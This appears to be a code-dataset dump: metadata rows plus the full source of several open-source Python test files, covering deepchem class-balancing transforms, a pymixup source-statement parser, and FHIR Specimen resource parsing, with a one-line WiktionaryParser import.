| 0.591882
| 0
| 0
| 0.73913
| 0
| 0
| 0.328947
| 0.029872
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c110aba556247840a81e0d2194a42594ea74bc5
| 6,824
|
py
|
Python
|
deepchem/trans/tests/test_balancing.py
|
micimize/deepchem
|
651df9f9d8e6f1b33d3af8f0be251e9e8095fe88
|
[
"MIT"
] | 1
|
2020-08-19T17:25:27.000Z
|
2020-08-19T17:25:27.000Z
|
deepchem/trans/tests/test_balancing.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2020-09-22T18:42:21.000Z
|
2020-09-22T18:42:21.000Z
|
deepchem/trans/tests/test_balancing.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2022-03-11T00:10:23.000Z
|
2022-03-11T00:10:23.000Z
|
import os
import numpy as np
import deepchem as dc
import itertools
import tempfile
def test_binary_1d():
"""Test balancing transformer on single-task dataset without explicit task dimension."""
n_samples = 20
n_features = 3
n_classes = 2
np.random.seed(123)
ids = np.arange(n_samples)
X = np.random.rand(n_samples, n_features)
y = np.random.randint(n_classes, size=(n_samples,))
w = np.ones((n_samples,))
dataset = dc.data.NumpyDataset(X, y, w)
balancing_transformer = dc.trans.BalancingTransformer(dataset=dataset)
dataset = balancing_transformer.transform(dataset)
X_t, y_t, w_t, ids_t = (dataset.X, dataset.y, dataset.w, dataset.ids)
# Check ids are unchanged.
for id_elt, id_t_elt in zip(ids, ids_t):
assert id_elt == id_t_elt
# Check X is unchanged since this is a w transformer
np.testing.assert_allclose(X, X_t)
# Check y is unchanged since this is a w transformer
np.testing.assert_allclose(y, y_t)
y_task = y_t
w_task = w_t
w_orig_task = w
# Assert that entries with zero weight retain zero weight
np.testing.assert_allclose(w_task[w_orig_task == 0],
np.zeros_like(w_task[w_orig_task == 0]))
# Check that sum of 0s equals sum of 1s in transformed for each task
assert np.isclose(np.sum(w_task[y_task == 0]), np.sum(w_task[y_task == 1]))
def test_binary_singletask():
"""Test balancing transformer on single-task dataset."""
n_samples = 20
n_features = 3
n_tasks = 1
n_classes = 2
np.random.seed(123)
ids = np.arange(n_samples)
X = np.random.rand(n_samples, n_features)
y = np.random.randint(n_classes, size=(n_samples, n_tasks))
w = np.ones((n_samples, n_tasks))
dataset = dc.data.NumpyDataset(X, y, w)
balancing_transformer = dc.trans.BalancingTransformer(dataset=dataset)
dataset = balancing_transformer.transform(dataset)
X_t, y_t, w_t, ids_t = (dataset.X, dataset.y, dataset.w, dataset.ids)
# Check ids are unchanged.
for id_elt, id_t_elt in zip(ids, ids_t):
assert id_elt == id_t_elt
# Check X is unchanged since this is a w transformer
np.testing.assert_allclose(X, X_t)
# Check y is unchanged since this is a w transformer
np.testing.assert_allclose(y, y_t)
for ind, task in enumerate(dataset.get_task_names()):
y_task = y_t[:, ind]
w_task = w_t[:, ind]
w_orig_task = w[:, ind]
# Assert that entries with zero weight retain zero weight
np.testing.assert_allclose(w_task[w_orig_task == 0],
np.zeros_like(w_task[w_orig_task == 0]))
# Check that sum of 0s equals sum of 1s in transformed for each task
assert np.isclose(np.sum(w_task[y_task == 0]), np.sum(w_task[y_task == 1]))
def test_binary_multitask():
"""Test balancing transformer on multitask dataset."""
n_samples = 10
n_features = 3
n_tasks = 5
n_classes = 2
ids = np.arange(n_samples)
X = np.random.rand(n_samples, n_features)
y = np.random.randint(n_classes, size=(n_samples, n_tasks))
w = np.ones((n_samples, n_tasks))
multitask_dataset = dc.data.NumpyDataset(X, y, w)
balancing_transformer = dc.trans.BalancingTransformer(
dataset=multitask_dataset)
multitask_dataset = balancing_transformer.transform(multitask_dataset)
X_t, y_t, w_t, ids_t = (multitask_dataset.X, multitask_dataset.y,
multitask_dataset.w, multitask_dataset.ids)
# Check ids are unchanged.
for id_elt, id_t_elt in zip(ids, ids_t):
assert id_elt == id_t_elt
# Check X is unchanged since this is a w transformer
np.testing.assert_allclose(X, X_t)
# Check y is unchanged since this is a w transformer
np.testing.assert_allclose(y, y_t)
for ind, task in enumerate(multitask_dataset.get_task_names()):
y_task = y_t[:, ind]
w_task = w_t[:, ind]
w_orig_task = w[:, ind]
# Assert that entries with zero weight retain zero weight
np.testing.assert_allclose(w_task[w_orig_task == 0],
np.zeros_like(w_task[w_orig_task == 0]))
# Check that sum of 0s equals sum of 1s in transformed for each task
assert np.isclose(np.sum(w_task[y_task == 0]), np.sum(w_task[y_task == 1]))
def test_multiclass_singletask():
"""Test balancing transformer on single-task dataset."""
n_samples = 50
n_features = 3
n_tasks = 1
n_classes = 5
ids = np.arange(n_samples)
X = np.random.rand(n_samples, n_features)
y = np.random.randint(n_classes, size=(n_samples, n_tasks))
w = np.ones((n_samples, n_tasks))
dataset = dc.data.NumpyDataset(X, y, w)
balancing_transformer = dc.trans.BalancingTransformer(dataset=dataset)
dataset = balancing_transformer.transform(dataset)
X_t, y_t, w_t, ids_t = (dataset.X, dataset.y, dataset.w, dataset.ids)
# Check ids are unchanged.
for id_elt, id_t_elt in zip(ids, ids_t):
assert id_elt == id_t_elt
# Check X is unchanged since this is a w transformer
np.testing.assert_allclose(X, X_t)
# Check y is unchanged since this is a w transformer
np.testing.assert_allclose(y, y_t)
for ind, task in enumerate(dataset.get_task_names()):
y_task = y_t[:, ind]
w_task = w_t[:, ind]
w_orig_task = w[:, ind]
# Check that sum of 0s equals sum of 1s in transformed for each task
for i, j in itertools.product(range(n_classes), range(n_classes)):
if i == j:
continue
assert np.isclose(
np.sum(w_task[y_task == i]), np.sum(w_task[y_task == j]))
def test_transform_to_directory():
"""Test that output can be written to a directory."""
n_samples = 20
n_features = 3
n_classes = 2
np.random.seed(123)
ids = np.arange(n_samples)
X = np.random.rand(n_samples, n_features)
y = np.random.randint(n_classes, size=(n_samples,))
w = np.ones((n_samples,))
dataset = dc.data.NumpyDataset(X, y, w)
balancing_transformer = dc.trans.BalancingTransformer(dataset=dataset)
with tempfile.TemporaryDirectory() as tmpdirname:
dataset = balancing_transformer.transform(dataset, out_dir=tmpdirname)
balanced_dataset = dc.data.DiskDataset(tmpdirname)
X_t, y_t, w_t, ids_t = (balanced_dataset.X, balanced_dataset.y,
balanced_dataset.w, balanced_dataset.ids)
# Check ids are unchanged.
for id_elt, id_t_elt in zip(ids, ids_t):
assert id_elt == id_t_elt
# Check X is unchanged since this is a w transformer
np.testing.assert_allclose(X, X_t)
# Check y is unchanged since this is a w transformer
np.testing.assert_allclose(y, y_t)
y_task = y_t
w_task = w_t
w_orig_task = w
# Assert that entries with zero weight retain zero weight
np.testing.assert_allclose(w_task[w_orig_task == 0],
np.zeros_like(w_task[w_orig_task == 0]))
# Check that sum of 0s equals sum of 1s in transformed for each task
assert np.isclose(np.sum(w_task[y_task == 0]), np.sum(w_task[y_task == 1]))
| 38.994286
| 90
| 0.699443
| 1,144
| 6,824
| 3.949301
| 0.096154
| 0.044267
| 0.046481
| 0.07127
| 0.860779
| 0.84772
| 0.8444
| 0.83444
| 0.822931
| 0.812528
| 0
| 0.010718
| 0.193288
| 6,824
| 174
| 91
| 39.218391
| 0.809991
| 0.216295
| 0
| 0.763359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183206
| 1
| 0.038168
| false
| 0
| 0.038168
| 0
| 0.076336
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c2ace55c3094d237b2ee33d730a279091ae7a83
| 10,872
|
py
|
Python
|
tests/obfuscatetests/test_ob_get_source_statements.py
|
rdevost/pymixup
|
9004fbdc7939033014b0eefa669056014647a0c8
|
[
"MIT"
] | 5
|
2017-01-02T15:12:31.000Z
|
2021-09-03T15:51:39.000Z
|
tests/obfuscatetests/test_ob_get_source_statements.py
|
rdevost/pymixup
|
9004fbdc7939033014b0eefa669056014647a0c8
|
[
"MIT"
] | null | null | null |
tests/obfuscatetests/test_ob_get_source_statements.py
|
rdevost/pymixup
|
9004fbdc7939033014b0eefa669056014647a0c8
|
[
"MIT"
] | 1
|
2021-09-03T15:51:41.000Z
|
2021-09-03T15:51:41.000Z
|
import pytest
from os.path import join
import io
from logic.obfuscatefile import source_statement_gen
def test_get_source_statements(tmpdir):
#
# Create a short source file
#
dir_name = str(tmpdir.mkdir('source'))
source_file = 'app.py'
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u'from x import y\n')
# Test a lines which continues with a \ --they should be merged
source.write(u'from z import a, \\ \n')
source.write(u'b, \\ \n')
source.write(u'c \n')
# Test a single-line doc string --it should be skipped
source.write(u'"""Single line-doc string with double-quotes."""\n')
source.write(u"'''Single line-doc string with single-quotes.'''\n")
# Test a multi-line doc string --they should be skipped
source.write(u'""" Multi-line \n')
source.write(u'doc string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n')
source.write(u"''' Multi-line \n")
source.write(u"doc string \n")
source.write(u"with single-quotes.\n")
source.write(u"'''\n")
# Test comment lines --it should be skipped
source.write(u' # This is a comment\n')
# Test code lines with comments,
# these will not be stripped by statement but rather by transformation
source.write(u' some_func(x) # Comment\n')
# Test skip platform block
source.write(u' # {+android}\n')
source.write(u' android_func(x)\n')
source.write(u' # {-android}\n')
# Keep kivy directives
source.write(u'#: scenario xyz\n')
# Treat line continuation with parens --they should be merged
source.write(u' row = get(\n')
source.write(u' dist_id if dist_id\n')
source.write(u' else var.dist.id)\n')
# Treat lines with parens in quotes --parens should be ignored
source.write(u'this "( should be a complete line("\n')
source.write(u"...as ')' should this')'\n")
# Treat multiline triple-quoted variable strings as strings
source.write(u'x = """ Multi-line \n')
source.write(u'string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n') # End with stand-alone quotes
source.write(u"x =''' Multi-line \n")
source.write(u"string \n")
source.write(u"with single-quotes.'''\n") # End with quotes at end
# Treat multiline triple-quoted strings as strings
source.write(u'"""\n')
source.write(u'Multi-line \n')
source.write(u'string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n')
source.write(u"'''\n")
source.write(u"Multi-line \n")
source.write(u"string \n")
source.write(u"with single-quotes.'''\n")
#
# Read source file for iOS platform (should skip android lines)
#
get_statement_gen = source_statement_gen(source_file, dir_name,
platform='iOS')
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
assert get_statement_gen.next()
#
# Read source file for android platform (should include android lines)
#
get_statement_gen = source_statement_gen(
source_file, dir_name, platform='android')
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u' android_func(x)', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
get_statement_gen.next()
#
# Read source file for default platform (should include android lines)
#
get_statement_gen = source_statement_gen(
source_file, dir_name)
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u' android_func(x)', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
get_statement_gen.next()
def test_get_source_statements_multiple_parens(tmpdir):
dir_name = str(tmpdir.mkdir('source'))
source_file = 'app.py'
# Test with adjacent single quotes
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u"class ValidationError(Exception):\n")
source.write(u"def __init__(self, message='', title=_('Error')):\n")
source.write(u"self.message = message\n")
source.write(u"self.title = title\n")
get_statement_gen = source_statement_gen(
source_file, dir_name)
assert get_statement_gen.next() == (
u"class ValidationError(Exception):", False)
assert get_statement_gen.next() == (
u"def __init__(self, message='', title=_('Error')):", False)
assert get_statement_gen.next() == (u"self.message = message", False)
assert get_statement_gen.next() == (u"self.title = title", False)
# Test with quoted parens
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u"self.lpar = Literal('(').suppress()\n")
source.write(u"self.rpar = Literal(')').suppress()\n")
get_statement_gen = source_statement_gen(source_file, dir_name)
assert get_statement_gen.next() == (
u"self.lpar = Literal('(').suppress()", False)
assert get_statement_gen.next() == (
u"self.rpar = Literal(')').suppress()", False)
with pytest.raises(StopIteration):
get_statement_gen.next()
| 37.75
| 78
| 0.588944
| 1,410
| 10,872
| 4.37305
| 0.090071
| 0.179046
| 0.209212
| 0.249595
| 0.847551
| 0.79614
| 0.786409
| 0.747973
| 0.703211
| 0.701103
| 0
| 0
| 0.256163
| 10,872
| 287
| 79
| 37.881533
| 0.762458
| 0.099982
| 0
| 0.780269
| 0
| 0
| 0.235765
| 0.015595
| 0
| 0
| 0
| 0
| 0.349776
| 1
| 0.008969
| false
| 0
| 0.053812
| 0
| 0.06278
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1c47745f1c0e2c39646a97885253608082c44006
| 46
|
py
|
Python
|
__init__.py
|
lucaskjaero/WiktionaryParser
|
c60a7cb7e50ca929e02c8e6e258c23f4d4114c21
|
[
"MIT"
] | 1
|
2021-08-24T17:51:41.000Z
|
2021-08-24T17:51:41.000Z
|
__init__.py
|
lucaskjaero/WiktionaryParser
|
c60a7cb7e50ca929e02c8e6e258c23f4d4114c21
|
[
"MIT"
] | null | null | null |
__init__.py
|
lucaskjaero/WiktionaryParser
|
c60a7cb7e50ca929e02c8e6e258c23f4d4114c21
|
[
"MIT"
] | 1
|
2020-12-14T16:22:31.000Z
|
2020-12-14T16:22:31.000Z
|
from .wiktionaryparser import WiktionaryParser
| 46
| 46
| 0.913043
| 4
| 46
| 10.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
98d48231698048016fa5002738e0348323b850f0
| 11,362
|
py
|
Python
|
fhirclient/models/specimen_tests.py
|
zzhou41/client-py
|
cbfa8d7c7f1bad233b237b7c5582fc0577b21f70
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/specimen_tests.py
|
zzhou41/client-py
|
cbfa8d7c7f1bad233b237b7c5582fc0577b21f70
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/specimen_tests.py
|
zzhou41/client-py
|
cbfa8d7c7f1bad233b237b7c5582fc0577b21f70
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b on 2019-07-29.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import specimen
from .fhirdate import FHIRDate
class SpecimenTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Specimen", js["resourceType"])
return specimen.Specimen(js)
def testSpecimen1(self):
inst = self.instantiate_from("specimen-example-isolate.json")
self.assertIsNotNone(inst, "Must have instantiated a Specimen instance")
self.implSpecimen1(inst)
js = inst.as_json()
self.assertEqual("Specimen", js["resourceType"])
inst2 = specimen.Specimen(js)
self.implSpecimen1(inst2)
def implSpecimen1(self, inst):
self.assertEqual(inst.accessionIdentifier.system, "http://lab.acme.org/specimens/2011")
self.assertEqual(inst.accessionIdentifier.value, "X352356-ISO1")
self.assertEqual(inst.collection.collectedDateTime.date, FHIRDate("2015-08-16T07:03:00Z").date)
self.assertEqual(inst.collection.collectedDateTime.as_json(), "2015-08-16T07:03:00Z")
self.assertEqual(inst.collection.method.coding[0].code, "BAP")
self.assertEqual(inst.collection.method.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0488")
self.assertEqual(inst.contained[0].id, "stool")
self.assertEqual(inst.id, "isolate")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.note[0].text, "Patient dropped off specimen")
self.assertEqual(inst.receivedTime.date, FHIRDate("2015-08-18T07:03:00Z").date)
self.assertEqual(inst.receivedTime.as_json(), "2015-08-18T07:03:00Z")
self.assertEqual(inst.status, "available")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "429951000124103")
self.assertEqual(inst.type.coding[0].display, "Bacterial isolate specimen")
self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
def testSpecimen2(self):
inst = self.instantiate_from("specimen-example-pooled-serum.json")
self.assertIsNotNone(inst, "Must have instantiated a Specimen instance")
self.implSpecimen2(inst)
js = inst.as_json()
self.assertEqual("Specimen", js["resourceType"])
inst2 = specimen.Specimen(js)
self.implSpecimen2(inst2)
def implSpecimen2(self, inst):
self.assertEqual(inst.accessionIdentifier.system, "https://vetmed.iastate.edu/vdl")
self.assertEqual(inst.accessionIdentifier.value, "20171120-1234")
self.assertEqual(inst.collection.collectedDateTime.date, FHIRDate("2017-11-14").date)
self.assertEqual(inst.collection.collectedDateTime.as_json(), "2017-11-14")
self.assertEqual(inst.container[0].type.coding[0].code, "RTT")
self.assertEqual(inst.container[0].type.coding[0].display, "Red Top Tube")
self.assertEqual(inst.container[0].type.coding[0].system, "https://vetmed.iastate.edu/vdl")
self.assertEqual(inst.container[0].type.text, "Red Top Blood Collection Tube")
self.assertEqual(inst.id, "pooled-serum")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.note[0].text, "Pooled serum sample from 30 individuals")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "Serum sample, pooled")
self.assertEqual(inst.type.coding[0].display, "Serum sample, pooled")
self.assertEqual(inst.type.coding[0].system, "https://vetmed.iastate.edu/vdl")
self.assertEqual(inst.type.text, "Pooled serum sample")
def testSpecimen3(self):
inst = self.instantiate_from("specimen-example-urine.json")
self.assertIsNotNone(inst, "Must have instantiated a Specimen instance")
self.implSpecimen3(inst)
js = inst.as_json()
self.assertEqual("Specimen", js["resourceType"])
inst2 = specimen.Specimen(js)
self.implSpecimen3(inst2)
def implSpecimen3(self, inst):
self.assertEqual(inst.accessionIdentifier.system, "http://lab.acme.org/specimens/2015")
self.assertEqual(inst.accessionIdentifier.value, "X352356")
self.assertEqual(inst.collection.collectedDateTime.date, FHIRDate("2015-08-18T07:03:00Z").date)
self.assertEqual(inst.collection.collectedDateTime.as_json(), "2015-08-18T07:03:00Z")
self.assertEqual(inst.container[0].capacity.unit, "mls")
self.assertEqual(inst.container[0].capacity.value, 50)
self.assertEqual(inst.container[0].specimenQuantity.unit, "mls")
self.assertEqual(inst.container[0].specimenQuantity.value, 10)
self.assertEqual(inst.container[0].type.text, "Non-sterile specimen container")
self.assertEqual(inst.id, "vma-urine")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.processing[0].description, "Acidify to pH < 3.0 with 6 N HCl.")
self.assertEqual(inst.processing[0].procedure.coding[0].code, "ACID")
self.assertEqual(inst.processing[0].procedure.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0373")
self.assertEqual(inst.processing[0].timeDateTime.date, FHIRDate("2015-08-18T08:10:00Z").date)
self.assertEqual(inst.processing[0].timeDateTime.as_json(), "2015-08-18T08:10:00Z")
self.assertEqual(inst.receivedTime.date, FHIRDate("2015-08-18T07:03:00Z").date)
self.assertEqual(inst.receivedTime.as_json(), "2015-08-18T07:03:00Z")
self.assertEqual(inst.status, "available")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "RANDU")
self.assertEqual(inst.type.coding[0].display, "Urine, Random")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0487")
def testSpecimen4(self):
inst = self.instantiate_from("specimen-example-serum.json")
self.assertIsNotNone(inst, "Must have instantiated a Specimen instance")
self.implSpecimen4(inst)
js = inst.as_json()
self.assertEqual("Specimen", js["resourceType"])
inst2 = specimen.Specimen(js)
self.implSpecimen4(inst2)
def implSpecimen4(self, inst):
self.assertEqual(inst.accessionIdentifier.system, "http://acme.com/labs/accession-ids")
self.assertEqual(inst.accessionIdentifier.value, "20150816-00124")
self.assertEqual(inst.collection.collectedDateTime.date, FHIRDate("2015-08-16T06:40:17Z").date)
self.assertEqual(inst.collection.collectedDateTime.as_json(), "2015-08-16T06:40:17Z")
self.assertEqual(inst.container[0].type.coding[0].code, "SST")
self.assertEqual(inst.container[0].type.coding[0].display, "Serum Separator Tube")
self.assertEqual(inst.container[0].type.coding[0].system, "http://acme.com/labs")
self.assertEqual(inst.id, "sst")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "119364003")
self.assertEqual(inst.type.coding[0].display, "Serum sample")
self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
def testSpecimen5(self):
inst = self.instantiate_from("specimen-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Specimen instance")
self.implSpecimen5(inst)
js = inst.as_json()
self.assertEqual("Specimen", js["resourceType"])
inst2 = specimen.Specimen(js)
self.implSpecimen5(inst2)
def implSpecimen5(self, inst):
self.assertEqual(inst.accessionIdentifier.system, "http://lab.acme.org/specimens/2011")
self.assertEqual(inst.accessionIdentifier.value, "X352356")
self.assertEqual(inst.collection.bodySite.coding[0].code, "49852007")
self.assertEqual(inst.collection.bodySite.coding[0].display, "Structure of median cubital vein (body structure)")
self.assertEqual(inst.collection.bodySite.coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.collection.bodySite.text, "Right median cubital vein")
self.assertEqual(inst.collection.collectedDateTime.date, FHIRDate("2011-05-30T06:15:00Z").date)
self.assertEqual(inst.collection.collectedDateTime.as_json(), "2011-05-30T06:15:00Z")
self.assertEqual(inst.collection.method.coding[0].code, "LNV")
self.assertEqual(inst.collection.method.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0488")
self.assertEqual(inst.collection.quantity.unit, "mL")
self.assertEqual(inst.collection.quantity.value, 6)
self.assertEqual(inst.contained[0].id, "hep")
self.assertEqual(inst.container[0].capacity.unit, "mL")
self.assertEqual(inst.container[0].capacity.value, 10)
self.assertEqual(inst.container[0].description, "Green Gel tube")
self.assertEqual(inst.container[0].identifier[0].value, "48736-15394-75465")
self.assertEqual(inst.container[0].specimenQuantity.unit, "mL")
self.assertEqual(inst.container[0].specimenQuantity.value, 6)
self.assertEqual(inst.container[0].type.text, "Vacutainer")
self.assertEqual(inst.id, "101")
self.assertEqual(inst.identifier[0].system, "http://ehr.acme.org/identifiers/collections")
self.assertEqual(inst.identifier[0].value, "23234352356")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.note[0].text, "Specimen is grossly lipemic")
self.assertEqual(inst.receivedTime.date, FHIRDate("2011-03-04T07:03:00Z").date)
self.assertEqual(inst.receivedTime.as_json(), "2011-03-04T07:03:00Z")
self.assertEqual(inst.status, "available")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "122555007")
self.assertEqual(inst.type.coding[0].display, "Venous blood specimen")
self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
| 58.266667
| 121
| 0.689403
| 1,389
| 11,362
| 5.62347
| 0.156947
| 0.224683
| 0.270004
| 0.074254
| 0.816285
| 0.761618
| 0.735629
| 0.59621
| 0.568045
| 0.464473
| 0
| 0.056762
| 0.161151
| 11,362
| 194
| 122
| 58.56701
| 0.762774
| 0.010474
| 0
| 0.337278
| 1
| 0
| 0.219187
| 0.01415
| 0
| 0
| 0
| 0
| 0.721893
| 1
| 0.065089
| false
| 0
| 0.035503
| 0
| 0.112426
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98d554d79299426017272bd9624e0f22cbdf0f75
| 4,606
|
py
|
Python
|
tests/Transform/test_Transform__diffusive_flux_mass_molar_to_mass_mass.py
|
kamilazdybal/multipy
|
